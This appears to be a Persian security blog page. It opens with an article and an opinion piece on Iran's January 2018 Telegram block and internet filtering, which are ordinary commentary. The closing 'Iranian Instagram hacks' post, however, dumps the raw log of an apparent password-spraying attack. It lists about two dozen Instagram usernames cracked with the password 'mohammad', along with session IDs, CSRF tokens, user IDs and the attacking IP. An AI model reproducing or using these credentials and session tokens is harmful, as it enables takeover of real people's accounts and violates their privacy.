واکسنی به اسم فیلترینگ

💉 واکسنی به اسم فیلترینگ

دهم دی ماه سال 1396 محبوب ترین پیام رسان خارجی در ایران به دستور” شورای عالی امنیت ملی ” فیلتر و 14 روز بعد در تاریخ 23 دی ماه رفع فیلتر شد. پیام رسانی که به نقل قول های متعدد بیش از 40% کاربران آن را مشترکان ایرانی تشکیل می دهند.

این درحالی‌ است که به گفته رئیس انجمن صنفی کسب و کارهای اینترنتی “حدود نیم میلیون فرصت شغلی که وارد این شبکه‌های مجازی شده‌اند و همچنین چند شرکت دانش بنیان خدمات تخصصی در این زمینه، پس از فیلترینگ معلق شدند”.

همچنین به گفته سید مرتضی موسویان رئیس مرکز توسعه فناوری اطلاعات و رسانه‌های دیجیتال وزارت ارشاد، در آمار رسمی این سازمان ۱۹ هزار کانال شامددار به ثبت رسیده که از این تعداد ۹۰۰۰ کانال مرتبط با فروش کالا یا خدمات بوده‌اند.

همه شما عزیزان به اهمیت فعالیت این پیام رسان در ایران، از همه جهات واقف هستید و مضرات فیلتر شدن تلگرام را بطور کامل می دانید ولی تا بحال به مزایای این فیلترینگ دقت کرده اید؟ به نظر شما 2 هفته فیلتر شدن تلگرام چه بازخوردهای مثبتی به همراه داشت؟ آیا پیش از فیلترینگ این پیام رسان به مزایای آن فکر شده بود ؟ در ادامه به نکاتی در این رابطه بصورت کاملا مختصر اشاره خواهیم کرد.

1. یکی از مهمترین مزایای این دوره طلایی افزایش سواد عمومی جامعه در حوزه IT در درک تفاوت بین پروتکل های مختلف، آشنایی مختصر با مفاهیم امنیتی و درک پورت و آی پی و استفاده از انواع و اقسام فیلتر شکن ها بود.بطوری که خیلی از مردم عزیز نحوه استفاده از سرورهای شخصی بعنوان فیلترشکن را یاد گرفته و به دست عموم رساندند و خیلی از عزیزان نحوه استفاده از این فیلترشکن ها را فراگرفتند.

2. از دیگر مزایای این طرح می توان به افزایش امنیت کاربران اشاره کرد بطوری که در این مدت هیچ یک از کاربران ایرانی به هیچ عنوان با استفاده از آدرس آی پی حقیقی خود از تلگرام استفاده نکرده و عملا احتمال امکان ردیابی کاربران در مصادیق مجرمانه در این دوهفته ، به شرط استفاده از شماره های مجازی نزدیک به صفر شد.

3. نکته حائز اهمیت دیگری که باعث متضرر شدن اپراتورهای همراه شد آشنا شدن مردم با نحوه استفاده از تماس صوتی بود تلگرام بود که مدت هاست بخاطر جلوگیری از ضرر به اپراتورهای همراه، بسته شده بود.

4. آمادگی بیش از پیش تلگرام برای جلوگیری از فیلتر شدن مجدد با راه اندازی شبکه باز تلگرام یا TON در فصل اول سال 2018 میلادی به گفته پاول دوروف، مدیر عامل و بنیان گذار تلگرام و همچنین کاهش بازه زمانی تکمیل این پروژه از سه ماه به یک ماه و تقریبا غیرقابل فیلتر شدن تلگرام از مزایای دیگر این طرح بود.

علاوه بر نکات بالا بازخوردهایی نیز در این میان کاملا محسوس بود که بعنوان مثال می توان به شکست سنگین پیام رسان های ایرانی حتی با اعمال فیلترینگ در رقابت با تلگرام، ناتوانی دولت در فیلتر کردن کامل یک شبکه اجتماعی، وابستگی اقتصادی و معیشتی مردم به شبکه های اجتماعی، ناکارآمد بودن طرح شامد در جلوگیری از فعالیت های غیر متعارف کانال های تلگرامی، افزایش اعتماد مردم به رعایت حریم شخصی کاربران توسط تلگرام و … اشاره کرد.

=-=-=-=-=-=-=

مطالب بیشتر :

تیم امنیتی ایران

@IrSecTeam_Org

 

تلگرام اره ای که امکان جابه جایی ان دیگر نیست: تلگرام دیگه برای یک ایرانی یک پیام رسان نیست، بلکه همه چیزی است که از اینترنت نیاز داره . خوبی ها و بدی های خودشو داره ولی مهمترین ضرری که تلگرام به ما میزنه به نظر من بسته بودن تلگرامه و جلوگیری اون از رشد اینترنت فارسی و تولید محتوی ، امروزه حتی افرادی که تلگرام دارن یک ایمیل ساده ندارن و نیازی هم نمیبینن که داشته باشن. دیگه وبلاگ نویس نمیبینید و همه یه کانال میزنن و مطالبشون رو اونجا مینویسن. مطالبی که هیچ وقت در اینترنت واقعی منتشر نمیشن و اگر شما لینک کانال یا اون گروه رو نداشته باشید هیچ وقت بهشون نمیرسید. مطمئنا این خوب نیست. یعنی فاجعه است . چرا این شد چرا تلگرام برای ما همه چی شد؟ جوابش ساده است به لطف فیلترینگ داسی سالهای پیش همه نیاز ها به سمت تلگرام کشیده شد. در فضایی که حتی یک وبلاگ با ۵ کاربر ماهانه بر روی بلاگفا تحمل نمیشد و مدیران وب سایت ها بابت یک کامنت بازداشت میشدن و سایت ها که همه چیز یک فرد بودن به راحتی فیلتر میشد مردم که خود عقل و شعور دارن ، اینجا احساس آرامش بیشتری داشتن. ولی آیا میشه تلگرام رو فیلتر کرد؟ جوابش ساده است : خیر. وقتی بیش از نیم میلیون شغل به گفته خود آقایان در تلگرام به وجود اومده دیگه شما فقط با تفریح یا خبر سر و کار ندارید بلکه دارید تصمیم مهتری میگیرید اینجا به سفره مردم هم وصل شده. البته قابل پیشبینی بود که ممکنه تلگرام فیلتر بشه ولی حوادث این روزها نشون داد که دیگه حتی تصمیم به فیلتر تلگرام از تصمیم به جهت دادن مردم به رفتن به سمتش غلط تر بود. چرا؟ جوابش در دانلود روزی ۷۰۰ هزار فیلترشکنه . باور کنید اگر رتبه بدترین کشور رو برای بدافزار های موبایل داریم دلیلش اینه که از ۱ بالاتر در این جدول دیگه جایگاهی نیست . من با حرف های سردار جلالی ریاست محترم پدافند غیر عامل موافقم بله تلگرام ایران رو اشغال کرده ولی دلیلش فقط شمایید که تنوع استفاده از سرویس های جهانی رو بروی ایرانی ها بستید و به امید اینکه شاید تلگرام شاید شاید به حرفتون گوش کنه با طنابش رفتید ته چاه و ملت رو هم بردید با خودتون. دیدید که در شرایط بحرانی قطعا تلگرام کانال هایی رو که لیست میکنید نمیبنده و فقط فیلتر تلگرام تاثیر حداکثر ۲ روزه بر روی مخاطبینش داره . ولی جالب تر از فیلتر تلگرام در این کشور استفاده همین مسئولین از سرویس های درست دنیا مثل تویتره . در همین شرایط تریبون وزرای محترم در حالی تویتره که سالهاست تویتر در ایران فیلتره !!. و جالب تر از اون اینه که حتی در شرایطی که تلگرام فیلتر نیست شما کانال رسمی یا گروه رسمی دولتی در اون نمیبینید ولی همزمان میتونید همه رو در تویتر پیدا کنید . برای کی توویت میکنن من نمیدونم :grin:. اگر دیوونه خونه نیست به منم بگید من بدونم کجاست. حالا باید دید رویکرد بعدی دولت محترم چیه و چطور این فاجعه اینترنت ایران که هر روز هم عمیق تر میشه رو مدیریت میکنه مطمئن باشید پاول برای همه ما خواب های رنگی تری هم دیده . پیشنهاد من باز کردن هر چه سریعتر سرویس های مهم دنیا به روی همه ایرانی هاست از جمله تویتر و فیسبوک و یوتیوب و تغییر نگرش داسی فیلترینگ به نگرش تعامل با دنیا و یا تبدیل نگرش داسی به ساتوری و بستن مطلق همه چی از تلگرام و فیلتر شکن ها گرفته تا هر چیزی که جدید میاد برای همیشه فقط مشکلش اینه که هر روز یه چیزی میاد تقریبا :joy: یا اینکه ببندیم اینترنت و راحت کنیم همه رو /// البته تجربه ثبات کرده حتما این اتفاقها نمیفته و همین مسیر شل کن و سفت کن رو میریم متاسفانه . جرجندی @webamoozir

Featured post

Iranian Instagram hacks

https://mohammad.khonji1384:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 186, Following: 479, Posts: 0, Is_Private: false, Orginal: false @hacracker||VNJHJPFNVRJNHABBDCMP|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 186, Following: 479, Posts: 0, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511530972\054 \”94.102.54.95\”: 29073}:1eIEFo:cuXfbS4ORm9dD05HklszG86fNYI”; ds_user_id=6408296754; Max-Age=7776000; csrftoken=ZE7zZg7fxifZzB8bbDlZJF396M83y3Ji; rur=ASH; sessionid=6408296754%3AOQB7OL5Z9hHaIk%3A10; target=””; mid=Whgh2AALAAFyJbHnnBFqI5SOuAZo; ig_vw=1024; ig_pr=1|||1511502152|0||3||||
https://mo13ham89mad:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 34, Following: 46, Posts: 155, Is_Private: false, Orginal: false @hacracker||SMPIHFLGOYYCMRIDSRFZ|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 34, Following: 46, Posts: 155, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531157\054 \”94.102.54.95\”: 29073}:1eIEIo:ErTJp8dNuq2wpqph_SnWmBcxfx8″; csrftoken=B7eqau1d0TKleqKbSuDMsB8s1D6gGctg; Max-Age=31449600; rur=FRC; mid=WhgilAALAAHv180Ww_HKe7hfd038; ig_vw=1024; ig_pr=1|||1511502339|0||3||||
https://kr_javad:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 76, Following: 38, Posts: 8, Is_Private: true, Orginal: false @hacracker||RGKVOUNYDZTOPKNHYAFK|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 76, Following: 38, Posts: 8, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531175\054 \”94.102.54.95\”: 29073}:1eIEJ5:epO7byMIsG_8pnOhHA51zXUSEdY”; ds_user_id=6363607729; Max-Age=7776000; csrftoken=sXtjYJiIGJD5L5WKuAyfaja7T6V8zSTP; rur=ATN; sessionid=IGSCeefe21eb39cd4a2461596ab38da0830341125fb6c1f6cbff9f49b1643a476220%3AAVPaKqzLyk90txsnuWIzDaWCsNYiuwHH%3A%7B%22_auth_user_id%22%3A6363607729%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226363607729%3A0xKG7es3Y6AfdjQlgUgr4dKPU02S2myU%3A0d01999bc3bc05c03531d25de492afa87783ab4bad330be7b6148a9ce526d018%22%2C%22last_refreshed%22%3A1511531172.1553990841%7D; target=””; mid=WhgiowALAAF3pr-We5oappmXPU-t; ig_vw=1024; ig_pr=1|||1511502356|0||3||||
https://mohammad1_evin:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 148, Following: 206, Posts: 6, Is_Private: false, Orginal: false @hacracker||PRSMRZTLMVZDBPYLOHZL|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 148, Following: 206, Posts: 6, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531413\054 \”94.102.54.95\”: 29073}:1eIEMv:sJED-qKv8GU6iv9RjbrxeA-5PoY”; ds_user_id=6174104532; Max-Age=7776000; csrftoken=GYv9LIA9oqTmG4B4nowup4Evw0CIFLc8; rur=PRN; sessionid=IGSCb668f6f4f85df94ada905ccec7d348b51b9b9c4c688ead85210d06e89d85b4f8%3AFp1PmOLyc6DJcIDoiZignz2eKVlx5Sw8%3A%7B%22_auth_user_id%22%3A6174104532%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226174104532%3A8haAXgaACncpbTFvIUOeiD4M8zvnohdz%3A21731f3d9d455ecc665f543891b15d039e17be9237a4f23fb221b249e22de441%22%2C%22last_refreshed%22%3A1511531411.1427969933%7D; target=””; mid=WhgjkQALAAE5Uf3nq6_Bgj_BPxMV; ig_vw=1024; ig_pr=1|||1511502593|0||3||||
https://mohamma.s7:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 65, Following: 65, Posts: 25, Is_Private: true, Orginal: false @hacracker||YCOYKPLGWRUUMOQMHERM|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 65, Following: 65, Posts: 25, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531489\054 \”94.102.54.95\”: 29073}:1eIEOA:i3QVotCfyNKTLpY2WOzXFfW_wQc”; ds_user_id=6289580252; Max-Age=7776000; csrftoken=53DEGpkX4uX8eyoziOUGrdhqJeNHNraP; rur=ASH; sessionid=IGSC294a0f6b8beac0404539b53964e88594abffa3545f7fe562f354a4d5c7d8bdf8%3AC1bcPjAsKrGpGVl5NqiPAZBTvJW9r5aK%3A%7B%22_auth_user_id%22%3A6289580252%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226289580252%3AnZEAVzORjUvPqBznQfytDVjdkbff6n78%3A6da1f57f82989ed9fb530a00e72749744077f207f543a4b032dc2ac38c8246f9%22%2C%22last_refreshed%22%3A1511531488.1830217838%7D; target=””; mid=Whgj3gALAAH9lExEiWjpBkMlvF48; ig_vw=1024; ig_pr=1|||1511502672|0||3||||
https://ma.hdi3165:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 57, Following: 243, Posts: 3, Is_Private: false, Orginal: false @hacracker||BPUCOUGPFXNZMHMVBAAK|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 57, Following: 243, Posts: 3, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531559\054 \”94.102.54.95\”: 29073}:1eIEPH:96OaqBigxWyNxBg8f4WvvRe_Oes”; ds_user_id=6320667573; Max-Age=7776000; csrftoken=FRdZcIdZtX8D5d5UYAPb6hcpHKBceCGI; rur=FRC; sessionid=IGSC31cb5d35749dc53fedd8e9d1d45ef27765c6f82196eade71a15379415f561d97%3AzXAMzlraRz1lDqpnSkbCcibmVCcJzioR%3A%7B%22_auth_user_id%22%3A6320667573%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226320667573%3Aw6hy0OXp7PvcurB3fM4zFWntFl7BBHEf%3Ad165488a93cc3770c59e9f033c60e7797c074622577e154023977aa64a51210d%22%2C%22last_refreshed%22%3A1511531555.2398791313%7D; target=””; mid=WhgkIQALAAGnf7eiUPch4OkVrF58; ig_vw=1024; ig_pr=1|||1511502740|0||3||||
https://mohammadre9086:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 3, Following: 8, Posts: 0, Is_Private: false, Orginal: false @hacracker||QJKQFZZRDVIXUCOJMENQ|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 3, Following: 8, Posts: 0, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531576\054 \”94.102.54.95\”: 29073}:1eIEPa:sOtkcjAupBHMZWjyb138TuCwp4g”; csrftoken=mKWTN5aQW7UybneXqWr23BrqTyQFanXr; Max-Age=31449600; rur=FRC; mid=WhgkNQALAAEfQVcVvSAgOiSV7ilm; ig_vw=1024; ig_pr=1|||1511502760|0||3||||
https://mohammadmahde6869408:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 38, Following: 103, Posts: 11, Is_Private: true, Orginal: false @hacracker||PXLALMXUAYMNQIRKINYT|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 38, Following: 103, Posts: 11, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531628\054 \”94.102.54.95\”: 29073}:1eIEQR:hGeB42DhgZu60HVZbo17Xd4nBCA”; csrftoken=LpRXei3jTRB51FhF3yfOPGTYosZjLz9Z; Max-Age=31449600; rur=FRC; mid=WhgkagALAAE3nxLwSZUdC6QfnRaJ; ig_vw=1024; ig_pr=1|||1511502812|0||3||||
https://mohammad.afshar.pv:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 258, Following: 505, Posts: 19, Is_Private: true, Orginal: false @hacracker||XLFPMHNGIWRTCYKKSUGB|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 258, Following: 505, Posts: 19, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531660\054 \”94.102.54.95\”: 29073}:1eIEQx:wzlHtzQS7beGFPYfJKa1-Ega1S4″; csrftoken=c0sqy41UsJA0A2fAKI01iDE5MoF2uGDp; Max-Age=31449600; rur=FRC; mid=WhgkiwALAAH2_I5yRaDfMDduT4wp; ig_vw=1024; ig_pr=1|||1511502844|0||3||||
https://zarymhmd407:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 545, Following: 589, Posts: 2, Is_Private: false, Orginal: false @hacracker||OZZTKOGIFXDLCQAXCEDL|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 545, Following: 589, Posts: 2, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531664\054 \”94.102.54.95\”: 29073}:1eIER0:NNYrBkb8k2x5r-CqtoJpHYn-c5g”; csrftoken=rwZwuUXXILRT5jXO6EvCLYk3paqeXjZ0; Max-Age=31449600; rur=FRC; mid=WhgkjgALAAGOGg8znFI4sz_KHqQK; ig_vw=1024; ig_pr=1|||1511502848|0||3||||
https://mohammad.alizade7596:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 1,483, Following: 735, Posts: 9, Is_Private: true, Orginal: false @hacracker||KZCZRCNDAXIXLMAIEWTV|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 1,483, Following: 735, Posts: 9, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531707\054 \”94.102.54.95\”: 29073}:1eIERf:MuOXRw18vfjX0Bd-YP5Kb7A_XmY”; ds_user_id=4528650261; Max-Age=7776000; csrftoken=ugKJ9edcAlPXQwYxnyzWrTK4eTAyhOZA; rur=FRC; sessionid=IGSC8451ebbe000d36b454da595ac185e7590cf7dd857adb30415b3c9a9a9aa23b46%3A5dBgRjNcH7fZB0h9brlFjzzQgMH3z2u9%3A%7B%22_auth_user_id%22%3A4528650261%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%224528650261%3AubwHU9vYkRaD8IAnmDYlq8ERW4WU3vWI%3A743f8493837ed0d38ae235b7a5718f3f4b084ec7b5cc89bfbaedd91ae7dc33f4%22%2C%22last_refreshed%22%3A1511531704.8089597225%7D; target=””; mid=WhgktwALAAFz1AroO9zPsT_qekR9; ig_vw=1024; ig_pr=1|||1511502889|0||3||||
https://i.6441:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 92, Following: 512, Posts: 38, Is_Private: false, Orginal: false @hacracker||RSKPEEUYHQUPXYYAJKLD|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 92, Following: 512, Posts: 38, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531769\054 \”94.102.54.95\”: 29073}:1eIESf:bsZJCfd4xwJkzlTNtj-M0ma1LGQ”; csrftoken=4JwzytncAs9Pjup7I9FxrTmLWmayAypx; Max-Age=31449600; rur=FRC; mid=Whgk9gALAAF5oRr8nhQLQzMXkseG; ig_vw=1024; ig_pr=1|||1511502950|0||3||||
https://hana_96.147:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 92, Following: 535, Posts: 13, Is_Private: true, Orginal: false @hacracker||ZHOLBPGUHKZWUTDRFVJC|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 92, Following: 535, Posts: 13, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531861\054 \”94.102.54.95\”: 29073}:1eIEU9:Uba7ybgVHzq69AMkDlNrBXLG-3I”; ds_user_id=6240677480; Max-Age=7776000; csrftoken=hMtswgEoYzFlf6X7bezVLPswKfXIQLLx; rur=FRC; sessionid=IGSCca7786d01d594bf678d241389a128ba22da82444eb6a68ed05cea512440ee845%3AiouXCj2Th1rvRlFxSNNpKbC6opMSuxly%3A%7B%22_auth_user_id%22%3A6240677480%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226240677480%3AmhGhC4YJ7rfYc4bqhvyrHARCSMgumkJN%3A2a4cfcd2cada6931b8537ea989fe6afb7d76353b7369510baf110362541102fd%22%2C%22last_refreshed%22%3A1511531858.2678015232%7D; target=””; mid=WhglUAALAAFGfEhOwSs_f55lrpyl; ig_vw=1024; ig_pr=1|||1511503043|0||3||||
https://arian671:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 121 – Found data to capture: Followers: 17, Following: 139, Posts: 2, Is_Private: true, Orginal: false @hacracker||LEHLIOAHVYZKBBQQAAUV|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 17, Following: 139, Posts: 2, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531921\054 \”94.102.54.95\”: 29073}:1eIEV9:P6mN6SdLkkkiqjV7mfQuOCbXEr8″; csrftoken=ZypxWKCvoS7ITJBFW4AdXsJD4fGPBUML; Max-Age=31449600; rur=FRC; mid=WhglkAALAAGhul9m-izx1BDVZxYG; ig_vw=1024; ig_pr=1|||1511503104|0||3||||
https://morteza.aghaei9159:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 248, Following: 1,092, Posts: 0, Is_Private: false, Orginal: false @hacracker||IFASKTZMVVZWXVIHTFLB|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 248, Following: 1,092, Posts: 0, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531945\054 \”94.102.54.95\”: 29073}:1eIEVV:09pf9DZ1uC3187mNC9brE6PbdLE”; ds_user_id=6148440655; Max-Age=7776000; csrftoken=fFvmdXebJxvfPzVGfWrcgs1L7g68nTdS; rur=PRN; sessionid=IGSC0234bf339f5f6024bfb04a050f606596aa3610b61b1be7a99aaf1e10701ea29c%3A9xqMJL51HGAQJmptsY7BHf01zyBLCyFG%3A%7B%22_auth_user_id%22%3A6148440655%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226148440655%3AMn4y6kUHjkjxKAFM14DzQlUMJp1Um503%3Af885d7c06ffd81a007a2df39c4454ffd2a942bfca608c796e9222af9ae418194%22%2C%22last_refreshed%22%3A1511531942.626101017%7D; target=””; mid=WhglpQALAAEOJzRrLvr18l2UMem4; ig_vw=1024; ig_pr=1|||1511503127|0||3||||
https://fasaa_1:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 38, Following: 259, Posts: 0, Is_Private: false, Orginal: false @hacracker||LNHZQVTGXKSZOLBXXEHV|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 38, Following: 259, Posts: 0, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531974\054 \”94.102.54.95\”: 29073}:1eIEVy:xcLDd29dxKZKJ2qZeWzw8vHj0IQ”; csrftoken=gb4kwvOF7i5fllwVy3bqy2issbzCS9fP; Max-Age=31449600; rur=FRC; mid=WhglwwALAAEMasZzAiwd0v4HwQYb; ig_vw=1024; ig_pr=1|||1511503156|0||3||||
https://mohmmad_219:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 77, Following: 201, Posts: 0, Is_Private: false, Orginal: false @hacracker||LQSBZUBRQFHETAFOQAUR|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 77, Following: 201, Posts: 0, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511532257\054 \”94.102.54.95\”: 29073}:1eIEaX:otJ7gFwBzGkf3p3OaBuC8Y-0QLY”; csrftoken=udXdAxGDVNHGNJtMJD4ZqhZAeWGU7KKr; Max-Age=31449600; rur=FRC; mid=Whgm3wALAAF0DtYrhSWlB3W6jH1N; ig_vw=1024; ig_pr=1|||1511503439|0||3||||
https://ho3ein5667:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 648, Following: 3,161, Posts: 12, Is_Private: false, Orginal: false @hacracker||XKROFATJBTVJNRROBVRY|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 648, Following: 3,161, Posts: 12, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511532461\054 \”94.102.54.95\”: 29073}:1eIEdp:BTuGlBbauqgKnju1ceBQSPh2TdY”; csrftoken=lm13mPFceixxDEOslRsBagJ35kSPWpME; Max-Age=31449600; rur=FRC; mid=WhgnqgALAAF9aRPqYTwHLt4l37HZ; ig_vw=1024; ig_pr=1|||1511503643|0||3||||
https://msdy1573:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 45, Following: 297, Posts: 0, Is_Private: false, Orginal: false @hacracker||CDLKFFGIALLGFWFVWLBV|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 45, Following: 297, Posts: 0, Is_Private: false, Orginal: false @hacracker|csrftoken=EMQAaDo0e6Zem5g3VIyU0X82WcyXlwQv; Max-Age=31449600; rur=FRC; mid=WhgnswALAAHQdgpD0PUo-EmEwkJf; ig_vw=1024; ig_pr=1|||1511503650|0||3||||
https://ho3ein.kazemiii:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 159, Following: 394, Posts: 10, Is_Private: true, Orginal: false @hacracker||EHXURJOGXYRECLHEFCEV|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 159, Following: 394, Posts: 10, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511532468\054 \”94.102.54.95\”: 29073}:1eIEdx:Mj4VB5nJXH0QgxjWT1jEoqlxTk8″; ds_user_id=6044022884; Max-Age=7776000; csrftoken=DuehmD12i9mz49A6Xih3zBksxGLFOLJI; rur=FTW; sessionid=6044022884%3AEovYbJk5hS7yGB%3A27; target=””; mid=WhgnsQALAAEgpBWu5LW-Np1QPHnt; ig_vw=1024; ig_pr=1|||1511503650|0||3||||
https://zmny3296:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 140, Following: 137, Posts: 13, Is_Private: false, Orginal: false @hacracker||EWSRBLRQBPKESVJJZJWS|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 140, Following: 137, Posts: 13, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511532600\054 \”94.102.54.95\”: 29073}:1eIEg6:6cDi1zowx_y-pq6iXyasuWNPMDM”; csrftoken=gJBxPCsS4OYJqXmvKQeuFztXsMnS2mbg; Max-Age=31449600; rur=FRC; mid=WhgoNwALAAFEcE3aLvflYuLFm3cu; ig_vw=1024; ig_pr=1|||1511503783|0||3||||
https://mhmmd1722:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 165, Following: 283, Posts: 9, Is_Private: false, Orginal: false @hacracker||BZYAVFVQFOZHMJIPIHZJ|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 165, Following: 283, Posts: 9, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511532723\054 \”94.102.54.95\”: 29073}:1eIEi4:H4FXE1KeAFXU_1vcoJgXVSLgMqc”; csrftoken=gpMx966YptN8bc2VhEtdjhwvivbi8PfW; Max-Age=31449600; rur=FRC; mid=WhgosgALAAHUHfWicQ52CUF22MB6; ig_vw=1024; ig_pr=1|||1511503906|0||3||||
